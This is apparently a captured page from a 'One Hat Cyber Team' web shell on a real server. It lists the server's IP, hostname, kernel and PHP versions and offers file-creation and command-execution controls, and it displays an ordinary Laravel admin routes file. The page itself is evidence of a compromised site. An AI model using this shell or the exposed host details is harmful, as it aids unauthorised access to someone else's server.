⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.67
Server IP:
50.6.168.112
Server:
Linux server-617809.webnetzimbabwe.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.4.10
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ctaacademy
/
www
/
old
/
Modules
/
Frontend
/
routes
/
View File Name :
web.php
'auth:admin', 'prefix' => 'admin', 'as' => 'admin.'], function () { Route::get('hero-section', [HeroSectionController::class, 'index'])->name('hero-section.index'); Route::put('hero-section', [HeroSectionController::class, 'update'])->name('hero-section.update'); Route::get('slider-section', [SliderSectionController::class, 'index'])->name('slider-section.index'); Route::put('slider-section', [SliderSectionController::class, 'update'])->name('slider-section.update'); Route::get('about-section', [AboutSectionController::class, 'index'])->name('about-section.index'); Route::put('about-section', [AboutSectionController::class, 'update'])->name('about-section.update'); Route::get('newsletter-section', [NewsLetterSectionController::class, 'index'])->name('newsletter-section.index'); Route::put('newsletter-section', [NewsLetterSectionController::class, 'update'])->name('newsletter-section.update'); Route::get('counter-section', [CounterSectionController::class, 'index'])->name('counter-section.index'); Route::put('counter-section', [CounterSectionController::class, 'update'])->name('counter-section.update'); Route::get('faq-section', [FaqSectionController::class, 'index'])->name('faq-section.index'); Route::put('faq-section', [FaqSectionController::class, 'update'])->name('faq-section.update'); Route::get('our-features-section', [OurFeaturesSectionController::class, 'index'])->name('our-features-section.index'); Route::put('our-features-section', [OurFeaturesSectionController::class, 'update'])->name('our-features-section.update'); Route::get('banner-section', [BannerSectionController::class, 'index'])->name('banner-section.index'); Route::put('banner-section', [BannerSectionController::class, 'update'])->name('banner-section.update'); Route::get('courses-by-category/{category_id}', [FeaturedCourseSectionController::class, 'coursesByCategory'])->name('courses-by-category'); Route::resource('featured-course-section', FeaturedCourseSectionController::class)->only(['index','update']); Route::resource('featured-instructor-section', FeaturedInstructorController::class)->only(['edit','update']); Route::resource('contact-section', ContactSectionController::class)->only(['index','update']); });